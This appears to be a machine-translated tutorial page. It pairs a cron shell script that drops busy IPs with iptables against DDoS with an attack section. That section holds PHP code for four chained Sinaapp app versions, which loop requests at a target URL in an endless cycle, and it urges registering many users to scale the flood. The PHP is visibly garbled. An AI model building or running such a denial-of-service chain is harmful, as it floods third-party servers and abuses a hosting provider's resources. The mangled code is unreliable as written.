This page collects two kinds of script related to DDoS attacks on servers. One is a Linux shell script, and the other is PHP code that runs in any environment that supports PHP. The source code for both is posted below.
Shell script for defending a server against DDoS attacks
1. Write the script
mkdir /root/bin
vi /root/bin/dropip.sh
#!/bin/bash
/bin/netstat -na | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -rn | head -10 | grep -v -E '192.168|127.0' | awk '{if ($2!=null && $1>4) {print $2}}' > /tmp/dropip
# The pipeline above writes the busiest remote IPs (more than 4 connections) to /tmp/dropip
# Drop each selected IP with iptables and append a line to the log
for i in $(cat /tmp/dropip)
do
/sbin/iptables -A INPUT -s "$i" -j DROP
echo "$i kill at $(date)" >> /var/log/ddos
done
2. Add execute permission
chmod +x /root/bin/dropip.sh
3. Add it to the scheduled tasks so that it runs every minute
crontab -e
*/1 * * * * /root/bin/dropip.sh
Note:
The most important part is the second line of the script. It takes the 10 IP addresses with the largest number of ESTABLISHED connections, excludes the internal IP segments starting with 192.168 or 127.0, and writes the addresses that hold more than 4 connections to the temporary file /tmp/dropip. The for loop then drops every IP address listed in /tmp/dropip through iptables and writes each one to the log file /var/log/ddos.
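A more careful version of the selection and blocking steps, as an added example that is not part of the original script: it parses the state and address columns directly, handles IPv4-mapped addresses, skips loopback and all RFC 1918 ranges, and avoids appending the same DROP rule every minute. The function names and the sample netstat lines are constructed for illustration.

```bash
#!/bin/bash
# Added example, not the page's script. Function names are hypothetical.

# Read `netstat -na` output on stdin and print each remote IPv4 address that
# holds more than $1 ESTABLISHED connections (default 4).
offenders() {
    awk -v limit="${1:-4}" '
        $6 == "ESTABLISHED" {
            ip = $5
            sub(/:[0-9]+$/, "", ip)       # strip the remote port
            sub(/^::ffff:/, "", ip)       # IPv4-mapped form on tcp6 sockets
            # Accept only dotted-quad addresses; anything else is ignored.
            if (ip !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) next
            # Skip loopback and private ranges with anchored, escaped patterns.
            if (ip ~ /^(127\.|10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/) next
            count[ip]++
        }
        END { for (ip in count) if (count[ip] > limit) print ip }
    ' | sort
}

# Append a DROP rule only when an identical rule is not already in the chain,
# so a job that runs every minute does not pile up duplicates.
block_ip() {
    /sbin/iptables -C INPUT -s "$1" -j DROP 2>/dev/null ||
        /sbin/iptables -A INPUT -s "$1" -j DROP
}

# Constructed sample input: 203.0.113.9 holds 5 established connections,
# 198.51.100.7 holds 2, and 192.168.1.20 is internal.
sample_netstat() {
    cat <<'EOF'
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 10.0.0.5:80 203.0.113.9:40001 ESTABLISHED
tcp 0 0 10.0.0.5:80 203.0.113.9:40002 ESTABLISHED
tcp 0 0 10.0.0.5:80 203.0.113.9:40003 ESTABLISHED
tcp 0 0 10.0.0.5:80 203.0.113.9:40004 ESTABLISHED
tcp6 0 0 ::ffff:10.0.0.5:80 ::ffff:203.0.113.9:40005 ESTABLISHED
tcp 0 0 10.0.0.5:80 203.0.113.9:40006 TIME_WAIT
tcp 0 0 10.0.0.5:80 198.51.100.7:51000 ESTABLISHED
tcp 0 0 10.0.0.5:80 198.51.100.7:51001 ESTABLISHED
tcp 0 0 10.0.0.5:80 192.168.1.20:33000 ESTABLISHED
tcp 0 0 10.0.0.5:80 192.168.1.20:33001 ESTABLISHED
EOF
}
```

On a live host the scheduled job would run `netstat -na | offenders 4` and pass each printed address to `block_ip`. A threshold of 4 also catches proxies and NAT gateways that carry many legitimate clients, so check it against normal traffic first.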
The second script uses PHP to write a DDoS attack and runs it from another cloud platform.
Sinaapp is used as the test platform.
Test method: create four versions of the app.
The homepage code of version 1 is as follows:
<Php
File_get_contents ('HTTP: // 2.mars.sinaapp.com/'); // version 1 triggers an attack (Access Version 2)
>
Version 2 homepage code:
<Php
File_get_contents ('HTTP: // www.xxx.com/ip.php'): // target
File_get_contents ('HTTP: // 3.mars.sinaapp.com/'); // Access Version 3
>
Version 3 homepage code:
<Php
For ($ I = 1; $ <= 10; $ I ++) {// here it's a bit evil, and more than a few times it's better
File_get_contents ('HTTP: // www.xxx.com/ip.php ');
File_get_contents ('HTTP: // 4.mars.sinaapp.com /');}
>
Version 4 homepage code:
<Php
File_get_contents ('HTTP: // 2.mars.sinaapp.com/'); // Access Version 2, leading to an endless loop
>
The above is an attack using a sinaapp user. You can expand it by yourself, register a large number of users, and create more versions to launch attacks. However, during the test, we found that each APP actually has two IP addresses. It is better to use multiple users.